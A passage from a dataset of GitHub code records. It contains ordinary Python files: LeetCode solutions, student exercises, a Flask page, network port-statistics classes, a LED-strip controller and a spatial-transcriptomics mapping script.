point\n L[j,i] = c\n U[j,i] = 0.0 # we know this element goes to zero\n U[j,i+1:n]=U[j,i+1:n]-c*U[i,i+1:n] # do subtraction of two rows\n L[i,j] = 0.0\n L[i,i] = 1.0\n return (L,U) # return modified form of A\n# only requires a forward- and back-substitution for each b, once the matrix A has been decomposed","repo_name":"Becca-O/Matrix-Conditioning_Gaussian-Elimination-and-Eigenvalue-Problems","sub_path":"HW7p3a.py","file_name":"HW7p3a.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38530916487","text":"import os\n\nfrom jinja2 import Template\nfrom IPython.core.display import display, HTML\n\nCURRENT_PATH = os.path.abspath(os.path.dirname(__file__))\n\n\nclass RenderEngine:\n def __init__(self, tmpl_file: str = \"templates/jupyter_notebook.html\"):\n tmpl_file = os.path.join(CURRENT_PATH, tmpl_file)\n self.tmpl_file = tmpl_file\n\n def render_notebook(self):\n if hasattr(self, \"render_to_tmpl\"):\n self.render_to_tmpl()\n\n with open(self.tmpl_file) as f:\n tmpl_file = f.read()\n tmpl = Template(tmpl_file)\n\n output = tmpl.render(chart=self)\n return display(HTML(output))\n\n show = render_notebook\n","repo_name":"charlesdong1991/py-roughviz","sub_path":"roughviz/render/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"77"} +{"seq_id":"1387186550","text":"from typing import List\n\nclass Solution:\n def longestConsecutive(self, nums: List[int]) -> int:\n \"\"\"Key Idea: identify non-contiguous values in L->R direction.\"\"\"\n # Store highest span so far\n answer = 0\n # Gather all numbers in a set to deduplicate\n number_set = {n for n in nums}\n # A number with nothing to its left is the start of a sequence\n for number in nums:\n if number - 1 in number_set:\n # Not a start of a sequence - pass to be consumed later\n continue\n else:\n # Start of sequence - count and remove all adjacent numbers to the right\n next = number + 1\n span = 1\n while next in number_set:\n span += 1\n number_set.remove(next)\n next += 1\n # Update highest contiguous count\n answer = max(answer, span)\n\n return answer\n","repo_name":"ArchTangent-study/leetcode","sub_path":"arrays_and_hashing/longest_consecutive_sequence/128_longest_consecutive_sequence_2.py","file_name":"128_longest_consecutive_sequence_2.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29452970799","text":"import random\n\ndef ocultar_letras(palabra, cantidad):\n letras_ocultas = list(palabra)\n posiciones_ocultas = random.sample(range(len(palabra)), cantidad)\n for pos in posiciones_ocultas:\n letras_ocultas[pos] = \"_\"\n return \"\".join(letras_ocultas)\n\ndef revisar_letra(palabra_secreta, palabra_oculta, letra):\n nueva_palabra_oculta = \"\"\n for i in range(len(palabra_secreta)):\n if palabra_secreta[i] == letra:\n nueva_palabra_oculta += letra\n else:\n nueva_palabra_oculta += palabra_oculta[i]\n return nueva_palabra_oculta\n\nif __name__ == \"__main__\":\n palabras_secretas = [\"perro\", \"gato\", \"elefante\", \"jirafa\", \"tigre\"]\n palabra_secreta = random.choice(palabras_secretas)\n letras_ocultas = ocultar_letras(palabra_secreta, int(len(palabra_secreta) / 2))\n intentos = 7\n \n print(\"Bienvenido al juego de adivinar la palabra secreta.\")\n print(\"La palabra secreta tiene\", len(palabra_secreta), \"letras.\")\n print(\"Tienes 7 intentos para adivinarla.\")\n\n while intentos > 0:\n print(\"\\nPalabra:\", letras_ocultas)\n print(\"Intentos restantes:\", intentos)\n opcion = input(\"Ingresa una letra o arriésgate a decir la palabra completa: \")\n\n if len(opcion) == 1:\n letras_ocultas = revisar_letra(palabra_secreta, letras_ocultas, opcion)\n if opcion not in palabra_secreta:\n intentos -= 1\n elif opcion == palabra_secreta:\n print(\"¡Felicidades! Has adivinado la palabra secreta.\")\n break\n else:\n intentos -= 1\n\n if intentos == 0:\n print(\"\\n¡Has agotado tus intentos! La palabra secreta era:\", palabra_secreta)\n\n print(\"\\nGracias por jugar. ¡Hasta la próxima!\")\n","repo_name":"pabloschwarzenberg/grader","sub_path":"tema4_ej1/tema4_ej1_0a695a4bdc652789c7aa1d5a0f79be1c.py","file_name":"tema4_ej1_0a695a4bdc652789c7aa1d5a0f79be1c.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71223074170","text":"''' S를 T로 변경하고자 한다면 로직을 생각하기 어렵지만, T를 S로 변경하면 쉽게 풀리는 문제이다.\n- S, T의 길이가 같을 때까지, 반복한다.\n- T의 마지막 문자열이 A이면 pop한다.\n- T의 마지막 문자열이 B이면 pop 후에, 문자열을 뒤집는다.'''\n\ns = list(input())\nt = list(input())\n\n\nwhile True:\n if len(t) == len(s):\n break\n\n if t[-1] == 'A':\n t.pop()\n\n elif t[-1] == 'B':\n t.pop()\n t.reverse()\n \n\nif t == s:\n print(1)\nelse:\n print(0)\n","repo_name":"confettimimy/Python-for-coding-test","sub_path":"그리디/[2_백준] 12904번 A와 B (거꾸로 생각하면 쉽게 풀리는 문제).py","file_name":"[2_백준] 12904번 A와 B (거꾸로 생각하면 쉽게 풀리는 문제).py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"45438215091","text":"\"\"\"\nProgram: Name Card Website\nAuthor: Subhashish Dhar\nDate: 12/10/2021\n\"\"\"\n\nfrom flask import Flask, render_template\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef say_hello():\n \"\"\"renders home page\"\"\"\n return render_template(\"index.html\")\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"subhashish06/100_days_of_python","sub_path":"Day-56-flask_personal_site/name_card_project/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10554997184","text":"\n\nclass Port:\n\n def __init__(self):\n self.name = None\n self.dn = None\n self.parent_dn = None\n self._handle = None\n self.admin_state = None\n self.max_speed = None\n self.oper_speed = None\n self.oper_state = None\n self.port_id = None\n self.peer_dn = None\n self.peer_port_id = None\n self.peer_slot_id = None\n\n def pop_base_params(self, port_data):\n self.name = port_data.name\n self.dn = port_data.dn\n self.parent_dn = port_data._ManagedObject__parent_dn\n self._handle = port_data._handle\n self.peer_dn = port_data.peer_dn\n self.admin_state = port_data.admin_state\n if getattr(port_data, 'max_speed', ''):\n self.max_speed = port_data.max_speed\n self.oper_speed = port_data.oper_speed\n self.oper_state = port_data.oper_state\n self.port_id = port_data.port_id\n if getattr(port_data, 'peer_port_id', ''):\n self.peer_port_id = port_data.peer_port_id\n if getattr(port_data, 'peer_slot_id', ''):\n self.peer_slot_id = port_data.peer_slot_id\n\n\nclass EthPortStat(Port):\n\n class EtherLoss:\n\n def __init__(self, data):\n self.dn = data.dn\n self.rn = data.rn\n self.time_collected = data.time_collected\n self.intervals = data.intervals\n self.carrier_sense = data.carrier_sense\n self.carrier_sense_delta = data.carrier_sense_delta\n self.excess_collision = data.excess_collision\n self.excess_collision_delta = data.excess_collision_delta\n self.giants = data.giants\n self.giants_delta = data.giants_delta\n self.multi_collision = data.multi_collision\n self.multi_collision_delta = data.multi_collision_delta\n self.single_collision = data.single_collision\n self.single_collision_delta = data.single_collision_delta\n self.sqe_test = data.sqe_test\n self.sqe_test_delta = data.sqe_test_delta\n self.symbol = data.symbol\n self.symbol_delta = data.symbol_delta\n\n class EtherPause:\n\n def __init__(self, data):\n self.dn = data.dn\n self.rn = data.rn\n self.time_collected = data.time_collected\n self.intervals = data.intervals\n self.recv_pause = data.recv_pause\n self.recv_pause_delta = data.recv_pause_delta\n self.resets = data.resets\n self.resets_delta = data.resets_delta\n self.xmit_pause = data.xmit_pause\n self.xmit_pause_delta = data.xmit_pause_delta\n\n class EtherErr:\n\n def __init__(self, data):\n self.dn = data.dn\n self.rn = data.rn\n self.time_collected = data.time_collected\n self.intervals = data.intervals\n self.align = data.align\n self.align_delta = data.align_delta\n self.deferred_tx = data.deferred_tx\n self.deferred_tx_delta = data.deferred_tx_delta\n self.fcs = data.fcs\n self.fcs_delta = data.fcs_delta\n self.int_mac_rx = data.int_mac_rx\n self.int_mac_rx_delta = data.int_mac_rx_delta\n self.int_mac_tx = data.int_mac_tx\n self.int_mac_tx_delta = data.int_mac_tx_delta\n self.out_discard = data.out_discard\n self.out_discard_delta = data.out_discard_delta\n self.rcv = data.rcv\n self.rcv_delta = data.rcv_delta\n self.under_size = data.under_size\n self.under_size_delta = data.under_size_delta\n self.xmit = data.xmit\n self.xmit_delta = data.xmit_delta\n\n class EtherRx:\n\n def __init__(self, data):\n self.dn = data.dn\n self.rn = data.rn\n self.time_collected = data.time_collected\n self.intervals = data.intervals\n self.broadcast_packets = data.broadcast_packets\n self.broadcast_packets_delta = data.broadcast_packets_delta\n self.jumbo_packets = data.jumbo_packets\n self.jumbo_packets_delta = data.jumbo_packets_delta\n self.multicast_packets = data.multicast_packets\n self.multicast_packets_delta = data.multicast_packets_delta\n self.total_bytes = data.total_bytes\n self.total_bytes_delta = data.total_bytes_delta\n self.total_packets = data.total_packets\n self.total_packets_delta = data.total_packets_delta\n self.unicast_packets = data.unicast_packets\n self.unicast_packets_delta = data.unicast_packets_delta\n\n class EtherTx:\n\n def __init__(self, data):\n self.dn = data.dn\n self.rn = data.rn\n self.time_collected = data.time_collected\n self.intervals = data.intervals\n self.broadcast_packets = data.broadcast_packets\n self.broadcast_packets_delta = data.broadcast_packets_delta\n self.jumbo_packets = data.jumbo_packets\n self.jumbo_packets_delta = data.jumbo_packets_delta\n self.multicast_packets = data.multicast_packets\n self.multicast_packets_delta = data.multicast_packets_delta\n self.total_bytes = data.total_bytes\n self.total_bytes_delta = data.total_bytes_delta\n self.total_packets = data.total_packets\n self.total_packets_delta = data.total_packets_delta\n self.unicast_packets = data.unicast_packets\n self.unicast_packets_delta = data.unicast_packets_delta\n\n def __init__(self):\n super().__init__()\n self.dn = None\n self.rn = None\n self.EtherPauseStats = None\n self.EtherLossStats = None\n self.EtherErrStats = None\n self.EtherRxStats = None\n self.EtherTxStats = None\n\n def pause_stats(self, data):\n self.EtherPauseStats = self.EtherPause(data)\n\n def loss_stats(self, data):\n self.EtherLossStats = self.EtherLoss(data)\n\n def err_stats(self, data):\n self.EtherErrStats = self.EtherErr(data)\n\n def rx_stats(self, data):\n self.EtherRxStats = self.EtherRx(data)\n\n def tx_stats(self, data):\n self.EtherTxStats = self.EtherTx(data)\n\n\nclass FcPortStat(Port):\n\n class FcStat:\n def __init__(self, data):\n self.time_collected = data.time_collected\n self.bytes_rx = data.bytes_rx\n self.bytes_rx_delta = data.bytes_rx_delta\n self.bytes_tx = data.bytes_tx\n self.bytes_tx_delta = data.bytes_tx_delta\n self.packets_tx = data.packets_tx\n self.packets_tx_delta = data.packets_tx_delta\n self.packets_rx = data.packets_rx\n self.packets_rx_delta = data.packets_rx_delta\n\n class FcErrStat:\n def __init__(self, data):\n self.time_collected = data.time_collected\n self.crc_rx = data.crc_rx\n self.crc_rx_delta = data.crc_rx_delta\n self.discard_rx = data.discard_rx\n self.discard_rx_delta = data.discard_rx_delta\n self.discard_tx = data.discard_tx\n self.discard_tx_delta = data.discard_tx_delta\n self.link_failures = data.link_failures\n self.link_failures_delta = data.link_failures_delta\n self.rx = data.rx\n self.rx_delta = data.rx_delta\n self.signal_losses = data.signal_losses\n self.signal_losses_delta = data.signal_losses_delta\n self.sync_losses = data.sync_losses\n self.sync_losses_delta = data.sync_losses_delta\n self.too_long_rx = data.too_long_rx\n self.too_long_rx_delta = data.too_long_rx_delta\n self.too_short_rx = data.too_short_rx\n self.too_short_rx_delta = data.too_short_rx_delta\n self.tx = data.tx\n self.tx_delta = data.tx_delta\n\n def __init__(self):\n super().__init__()\n self.FcErrStats = None\n self.FcStats = None\n\n def err_stats(self, data):\n self.FcErrStats = self.FcErrStat(data)\n\n def stats(self, data):\n self.FcStats = self.FcStat(data)\n\n\nclass EthPortChannelStat(EthPortStat):\n pass\n\n\nclass FcPortChannelStat(FcPortStat):\n pass\n\n","repo_name":"ToxicSamN/pyucs","sub_path":"pyucs/statsd/portstats.py","file_name":"portstats.py","file_ext":"py","file_size_in_byte":8276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16975852336","text":"class Solution:\n def lengthOfLongestSubstring(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n maxLength = 0\n startPos = 0\n endPos = 0\n indexTable = {}\n while endPos < len(s) and startPos <= endPos:\n if s[endPos] not in indexTable or indexTable[s[endPos]] < startPos:\n indexTable[s[endPos]] = endPos\n maxLength = max(maxLength, endPos - startPos + 1)\n else:\n startPos = indexTable[s[endPos]] + 1\n maxLength = max(maxLength, endPos - startPos + 1)\n indexTable[s[endPos]] = endPos\n endPos += 1\n return maxLength\n\nsolution = Solution()\nmaxLength = solution.lengthOfLongestSubstring(\"abcabcbb\")\nprint(maxLength)\n\n\n\n","repo_name":"zzhyzzh/Leetcode","sub_path":"leetcode-algorithms/003. Longest Substring Without Repeating Characters/lengthOfLongestSubstring2.py","file_name":"lengthOfLongestSubstring2.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40873987139","text":"import itertools\nfrom bliss import setup_globals\nfrom bliss.config import settings\nfrom .session import get_current as _current_session\n\n\nclass _active_mg_proxy(object):\n def __getattribute__(self, attr):\n if attr == '__class__':\n return MeasurementGroup\n return getattr(get_active(), attr)\n\n def __setattr__(self, name, value):\n active = get_active()\n return setattr(active, name, value)\n \n def __repr__(self):\n return repr(get_active())\n\n\nACTIVE_MG = _active_mg_proxy()\n\n\ndef get_all():\n \"\"\"\n Return all measurement groups found in the global environment\n \"\"\"\n return [x for x in setup_globals.__dict__.values() if x != ACTIVE_MG and isinstance(x, MeasurementGroup)]\n\n\ndef get_active():\n \"\"\"\n Return the current active MeasurementGroup\n\n Get the last known active measurement group from redis,\n or get the first found in global environment (and set it as active).\n If nothing works, returns a measurement group called None,\n which does not specify any counter.\n \"\"\"\n all_mg = get_all()\n name = get_active_name()\n try:\n if name is None:\n mg = all_mg[0]\n set_active_name(mg.name)\n return mg\n else:\n for mg in all_mg:\n if name == mg.name:\n return mg\n raise IndexError\n except IndexError:\n set_active_name(None)\n return MeasurementGroup(None, { \"counters\": [] })\n\n\ndef get_active_name():\n session = _current_session()\n session_name = session.name if session is not None else 'unnamed'\n active_mg_name = settings.SimpleSetting('%s:active_measurementgroup' % session_name)\n return active_mg_name.get()\n\n\ndef set_active_name(name):\n session = _current_session()\n session_name = session.name if session is not None else 'unnamed'\n active_mg_name = settings.SimpleSetting('%s:active_measurementgroup' % \n session_name)\n if name is None:\n active_mg_name.clear()\n else:\n active_mg_name.set(name)\n\n\nclass MeasurementGroup(object):\n def __init__(self,name,config_tree):\n \"\"\"MeasurementGroup is a helper to activate detectors\n for counting procedure.\n\n name -- the measurement name\n config_tree -- measurement configuration.\n in this dictionary we need to have:\n counters -- a name list of available counters\n default -- if True set as default measurement\n \"\"\"\n counters_list = config_tree.get('counters')\n if counters_list is None:\n raise ValueError(\"MeasurementGroup: should have a counters list\")\n self.name = name\n self._available_counters = list(counters_list)\n self._current_config = settings.SimpleSetting('%s' % name,\n default_value='default')\n # disabled counters\n self._counters_settings = settings.HashSetting('%s:%s' %\n (name, self._current_config.get()))\n\n @property\n def state_names(self):\n \"\"\" list of states for this measurement\n \"\"\"\n return list((x.split(':')[-1] for x in settings.scan(match='%s:*' % self.name)))\n\n @property\n def available(self):\n \"\"\"available counters from the static config\n \"\"\"\n return self._available_counters\n\n @property\n def disable(self):\n \"\"\" disabled counters name\n \"\"\"\n return [name for name in self.available if name in self._counters_settings]\n\n @disable.setter\n def disable(self,counters):\n counter2disable = self.__counters2set(counters)\n possible2disable = set(self._available_counters).intersection(counter2disable)\n unpos2disable = counter2disable.difference(possible2disable)\n if unpos2disable:\n raise ValueError(\"MeasurementGroup: could not disable counters (%s)\" %\n (','.join(unpos2disable)))\n self._counters_settings.update(dict((name,True) for name in counter2disable))\n\n @property\n def enable(self):\n \"\"\" enabled counters name\n \"\"\"\n return [name for name in self.available if name not in self._counters_settings]\n\n @enable.setter\n def enable(self,counters):\n counters = self.__counters2set(counters)\n possible2enable = set(self._available_counters).intersection(counters)\n unpos2enable = counters.difference(possible2enable)\n if unpos2enable:\n raise ValueError(\"MeasurementGroup: could not disable counters (%s)\" %\n (','.join(unpos2enable)))\n\n self._counters_settings.remove(*counters)\n\n @property\n def state_names(self):\n \"\"\" current configuration name for the measurment\n \"\"\"\n return self._current_config.get()\n\n def switch_state(self,name):\n self._current_config.set(name)\n self._counters_settings = settings.HashSetting('%s:%s' %\n (self.name,name))\n def remove_states(self,*state_names):\n \"\"\"\n will remove one or several state(s) for this measurement\n state_name -- the state name(s) you want to remove\n \"\"\"\n cnx = self._current_config._cnx()\n names = ['%s:%s' % (self.name,name) for name in state_names]\n cnx.delete(*names)\n \n def copy_from_state(self,name):\n \"\"\"\n this will copy the configuration into the current\n \"\"\"\n tmp_hash = settings.HashSetting('%s:%s' % (self.name,name))\n self._counters_settings.clear()\n for k,v in tmp_hash.iteritems():\n self._counters_settings[k] = v\n \n def __counters2set(self,counters):\n if not isinstance(counters,(tuple,list,set)):\n counters = list((counters,))\n return set((x.name if hasattr(x,'name') else x for x in counters))\n\n def __repr__(self):\n s = 'MeasurementGroup: %s (%s)\\n\\n' % (self.name,self._current_config.get())\n enabled = list(self.enable) + ['Enabled']\n \n max_len = max((len(x) for x in enabled))\n str_format = ' %-' + '%ds' % max_len + ' %s\\n'\n s += str_format % ('Enabled','Disabled')\n s += str_format % ('-' * max_len,'-' * max_len)\n for enable,disable in itertools.izip_longest(self.enable,\n self.disable,fillvalue=''):\n s += str_format % (enable,disable)\n return s\n\n \n\n","repo_name":"tiagocoutinho/bliss","sub_path":"bliss/common/measurementgroup.py","file_name":"measurementgroup.py","file_ext":"py","file_size_in_byte":6574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31879229695","text":"import modules.core as core\nimport modules.kubernetes as kubernetes\nimport modules.glances as glances\nimport app.utilities as utilities\nimport app.application as application\n\nslide = 0\nslides = [\n glances.get_cpu_page,\n glances.get_swap_memory_page,\n glances.get_cpu_load_page,\n core.get_temperature_page,\n core.get_usage_page,\n kubernetes.get_page,\n]\nmaxSlide = len(slides) - 1\n\ndef on_update(screen):\n global slides, slide, maxSlide\n changeSlide = int(application.get_tick() % 5) # If the number is divisible by 5 then it will be 0\n if (changeSlide == 0):\n if (slide < maxSlide):\n slide = (slide + 1)\n else:\n slide = 0\n \n slides[slide](screen)\n\n utilities.log(\"Tick: \" + str(application.get_tick()))\n utilities.log(\"Change slide: \" + str(changeSlide))\n utilities.log(\"Slide: \" + str(slide))\n utilities.log(\"Max Slide: \" + str(maxSlide))\n\n utilities.log(\"Hostname: \" + core.get_hostname())\n utilities.log(\"Local IP: \" + core.get_local_ip())\n utilities.log(\"CPU Temp: \" + core.get_cpu_temperature())\n utilities.log(\"CPU Usage: \" + core.get_cpu_useage())\n utilities.log(\"Memory Usage: \" + core.get_memory_useage())\n\napplication.setup(on_update)","repo_name":"AceXintense/k3s-screen","sub_path":"init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29331896589","text":"#Aprobación De Créditos\ning = int(input(\"Indique sus ingresos: \"))\naño_nacimiento = int(input(\"Ingrese su AÑO de nacimiento: \"))\nedad = (2022-año_nacimiento)\nhijos = int(input(\"Indique su número de hijos: \"))\naños_pertenencia = int(input(\"Indique sus años de pertenencia en el banco: \"))\nestado_civil= input(\"Indique su estado civil S/C: \")\nvivienda = input(\"Indique donde vive: \\n U: Urbano \\t R: Rural :\")\n\nif años_pertenencia > 10 and hijos >= 2:\n print(\"APROBADO\")\nelif estado_civil == \"C\" and edad > 3 and edad >= 45 or edad <= 55:\n print(\"APROBADO\")\nelif ing > 2500000 and estado_civil == \"S\" and vivienda == \"U\":\n print(\"APROBADO\")\nelif ing > 3500000 and años_pertenencia > 5:\n print(\"APROBADO\")\nelif vivienda == \"R\" and estado_civil == \"C\" and hijos < 2:\n print(\"APROBADO\")\nelse:\n print(\"RECHAZADO\")","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej3/hito1_ej3_df113910acd1316e538d7f667841e910.py","file_name":"hito1_ej3_df113910acd1316e538d7f667841e910.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23721732071","text":"import board\nimport neopixel\nimport time\nimport random\nimport argparse\nfrom datetime import datetime\nimport sys\n\nimport socket\nimport os\n\nclass Colors(object):\n def __init__(self, speed):\n self.NUM_LEDS = 707\n self.pixels = neopixel.NeoPixel(board.D18, self.NUM_LEDS, brightness=0.2, auto_write=False)\n self.wait_ms = speed\n self.color = self.rand_color()\n random.seed(datetime.now().timestamp())\n\n def rand_color(self):\n c = [\n ((255, 255, 255)),\n ((255,0,0)),\n ((0,255,0)),\n ((0,0,255)),\n ((0,255,255)),\n ((255,0,255)),\n ((255,255,0))\n ]\n return random.choice(c)\n\n def rings(self):\n ring_count = int(self.NUM_LEDS/9)\n for x in range(5):\n for y in range(9):\n self.pixels.fill((0, 0, 9))\n for z in range(ring_count):\n self.pixels[z + (x*ring_count)] = self.color\n self.pixels.show()\n \n def clear(self):\n self.color=((0,0,0))\n self.colorWipe()\n self.pixels.show()\n\n def colorWipe(self):\n for i in range(self.NUM_LEDS):\n self.pixels[i] = self.color\n if i%6 == 0:\n self.pixels.show()\n\n def blink(self):\n for i in range(3):\n self.pixels.fill((255, 255, 255))\n self.pixels.show()\n time.sleep(.5)\n self.pixels.fill((0,0,0))\n self.pixels.show()\n time.sleep(.5)\n\n def theaterChase(self):\n for q in range(1):\n for i in range(0, self.NUM_LEDS, 3):\n self.pixels[i+q%2] = self.color\n if i%4 == 0:\n self.pixels.show()\n time.sleep(self.wait_ms/1000.0)\n for i in range(0, self.NUM_LEDS, 3):\n self.pixels[i+q%2] = ((0,0,0))\n if i%4 == 0:\n self.pixels.show()\n time.sleep(self.wait_ms/1000.0)\n\n def wheel(self, pos):\n if pos < 85:\n return (((pos*3)&255, (255-pos*3)&255, 0))\n elif pos < 170:\n return (((255-pos*3)&255, 0, (pos*3)&255))\n else:\n pos-=170\n return ((0, (pos*3)&255, (255-pos*3)&255))\n\n def rainbow(self):\n for j in range(256):\n for i in range(self.NUM_LEDS):\n if j%5 == 0:\n self.pixels[i] = self.wheel((i+j)&255)\n if j%5 == 0:\n self.pixels.show()\n\n def rainbowCycle(self):\n for j in range(2):\n for i in range(self.NUM_LEDS):\n if i%9 == 0:\n self.pixels.fill(self.wheel(int(i*256 / self.NUM_LEDS)&255))\n self.pixels.show()\n\n def rand(self):\n fill = []\n for i in range(int(self.NUM_LEDS)):\n fill.append(i)\n random.shuffle(fill)\n for i in fill:\n self.pixels[i] = ((random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)))\n if i %5 == 0:\n self.pixels.show()\n\n def solid_rand(self):\n fill = []\n for i in range(int(self.NUM_LEDS)):\n fill.append(i)\n random.shuffle(fill)\n for i in fill:\n self.pixels[i] = self.color\n if i%5 == 0:\n self.pixels.show()\n\n \n def rand_clear(self):\n fill = []\n for i in range(int(self.NUM_LEDS)):\n fill.append(i)\n random.shuffle(fill)\n for i in fill:\n self.pixels[i] = ((0, 0, 0))\n if i %5 == 0:\n self.pixels.show()\n self.allclear()\n\n def READING(self):\n self.pixels.fill((255,0,0))\n self.pixels.show()\n\n def DONE(self):\n for i in range(3):\n self.pixels.fill((0,255,0))\n self.pixels.show()\n time.sleep(.1)\n self.pixels.fill((0,0,0))\n self.pixels.show()\n time.sleep(.1)\n\n time.sleep(0.5)\n\n def allclear(self):\n self.pixels.fill((0,0,0))\n self.pixels.show()\n\ndef run_command(command):\n data = command.lower()\n commands = data.split(\" \")\n c = None\n try:\n c = Colors(int(commands[0]))\n commands = commands[1:]\n except Exception as e:\n c = Colors(1)\n\n for action in commands:\n if action == \"blink\":\n c.blink()\n elif action == \"rings\":\n c.rings()\n elif action == \"color_wipe\":\n c.colorWipe()\n elif action == \"theater_chase\":\n c.theaterChase()\n elif action == \"rainbow\":\n c.rainbow()\n elif action == \"rainbow_cycle\":\n c.rainbowCycle()\n elif action == \"rand\":\n c.rand()\n elif action == \"solid_rand\":\n c.solid_rand()\n elif action == \"reading\":\n c.READING()\n elif action == \"done\":\n c.DONE()\n elif action == \"rand_clear\":\n c.rand_clear()\n elif action == \"allclear\":\n c.allclear()\n elif action == \"clear\":\n c.clear()\n c.allclear()\n\ndef openSocket():\n sock_path = '/home/hat/ledsock'\n try:\n os.unlink(sock_path)\n except OSError:\n if os.path.exists(sock_path):\n raise\n with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:\n s.bind(sock_path)\n s.listen(1)\n while True:\n c, a = s.accept()\n print(\"Connection made...\")\n with c:\n while True:\n data = c.recv(1024)\n if not data:\n break\n print(data)\n run_command(data.decode())\n\nif __name__ == \"__main__\":\n openSocket()\n","repo_name":"ShoolerM/HackMyHat2","sub_path":"leds.py","file_name":"leds.py","file_ext":"py","file_size_in_byte":5831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14991503895","text":"# 1345. Jump Game IV\n# 🔴 Hard\n#\n# https://leetcode.com/problems/jump-game-iv/\n#\n# Tags: Array - Hash Table - Breadth-First Search\n\nimport json\nimport os\nimport timeit\nfrom collections import defaultdict, deque\nfrom typing import List\n\n\n# What we have is a connected undirected graph where we can use the\n# element indexes as the vertex identifiers, we want to go from 0 to n-1\n# in the minimum number of steps possible, we can use breadth-first\n# search, to prepare for it, we can first create an adjacency list,\n# each node's neighbors are the vertices before and after, and any other\n# vertices with the same value.\n#\n# Time complexity: O(n) - We have three sections that visit each element\n# on the input array and do constant work.\n# Space complexity: O(n) - There are several data structures that take\n# n memory.\n#\n# Runtime 670 ms Beats 96.59%\n# Memory 27.7 MB Beats 91.87%\nclass Solution:\n def minJumps(self, arr: List[int]) -> int:\n n = len(arr)\n # Base case.\n if n < 2:\n return 0\n # A dictionary of vertices indexed by values.\n d = defaultdict(list)\n for i in reversed(range(n)):\n d[arr[i]].append(i)\n # A function that gets all neighbors of a node that we have not\n # queued yet.\n def getUnqueuedNeighbors(i: int) -> List[int]:\n adj = []\n # We can reach the element before.\n if 0 < i and not seen[i - 1]:\n seen[i - 1] = True\n adj.append(i - 1)\n # We can reach the element after.\n if i < n - 1 and not seen[i + 1]:\n seen[i + 1] = True\n adj.append(i + 1)\n # We can also reach any element with the same value.\n if arr[i] in d:\n for node in d[arr[i]]:\n if node != i:\n adj.append(node)\n seen[node] = True\n d.pop(arr[i])\n return adj\n\n # A list of nodes that we have visited already.\n seen = [False] * n\n seen[0] = True\n # BFS starting at 0 and counting the steps until we reach n-1.\n steps, level = 0, deque([0])\n while level:\n steps += 1\n # Process an entire level.\n for _ in range(len(level)):\n current = level.popleft()\n for nei in getUnqueuedNeighbors(current):\n # If this is the target node, return.\n if nei == n - 1:\n return steps\n level.append(nei)\n raise Exception(\"Unreachable code\")\n\n\ndef test():\n executors = [Solution]\n # The tests are big, use a separate JSON file.\n __location__ = os.path.realpath(\n os.path.join(os.getcwd(), os.path.dirname(__file__))\n )\n with open(os.path.join(__location__, \"jump-game-iv.json\")) as json_file:\n tests = json.load(json_file)\n for executor in executors:\n start = timeit.default_timer()\n for _ in range(1):\n for col, t in enumerate(tests):\n sol = executor()\n result = sol.minJumps(t[\"arr\"])\n exp = t[\"res\"]\n assert result == exp, (\n f\"\\033[93m» {result} <> {exp}\\033[91m for\"\n + f\" test {col} using \\033[1m{executor.__name__}\"\n )\n stop = timeit.default_timer()\n used = str(round(stop - start, 5))\n cols = \"{0:20}{1:10}{2:10}\"\n res = cols.format(executor.__name__, used, \"seconds\")\n print(f\"\\033[92m» {res}\\033[0m\")\n\n\ntest()\n","repo_name":"raul-sauco/coding-challenges","sub_path":"leetcode/jump-game-iv.py","file_name":"jump-game-iv.py","file_ext":"py","file_size_in_byte":3673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"4917031456","text":"import numpy as np\nimport pandas as pd\nimport scanpy as sc\nimport tangram as tg\nfrom pathlib import Path\n\nPath(\"data/ad_maps/SlideSeq\").mkdir(parents=True, exist_ok=True)\nPath(\"data/ad_maps/STARmap\").mkdir(parents=True, exist_ok=True)\n\n# we follow the Tangram Tutorial without squidpy\n\n##### Load the spatial data: Slide-seq data, 9852 spatial voxels, 24518 genes\nprint('Reading SlideSeq spatial data ...')\nad_sp = sc.read_h5ad('data/slideseq_MOp_1217.h5ad')\nprint(ad_sp)\n\n##### Load single cell data, MOp 10Xv3 dataset, 26431 profiled cells with 27742 genes\nprint('Reading MOp 10Xv3 single cell data ...')\nad_sc = sc.read_h5ad('data/mop_sn_tutorial.h5ad')\nprint(ad_sc)\n# normalize the number of counts within each cell to a fixed number\nprint('Normalizing counts ...')\nsc.pp.normalize_total(ad_sc)\n\n##### Prepare to map\nprint('Reading marker genes ...')\ndf_genes = pd.read_csv('data/MOp_markers.csv', index_col=0)\nmarkers = np.reshape(df_genes.values, (-1, 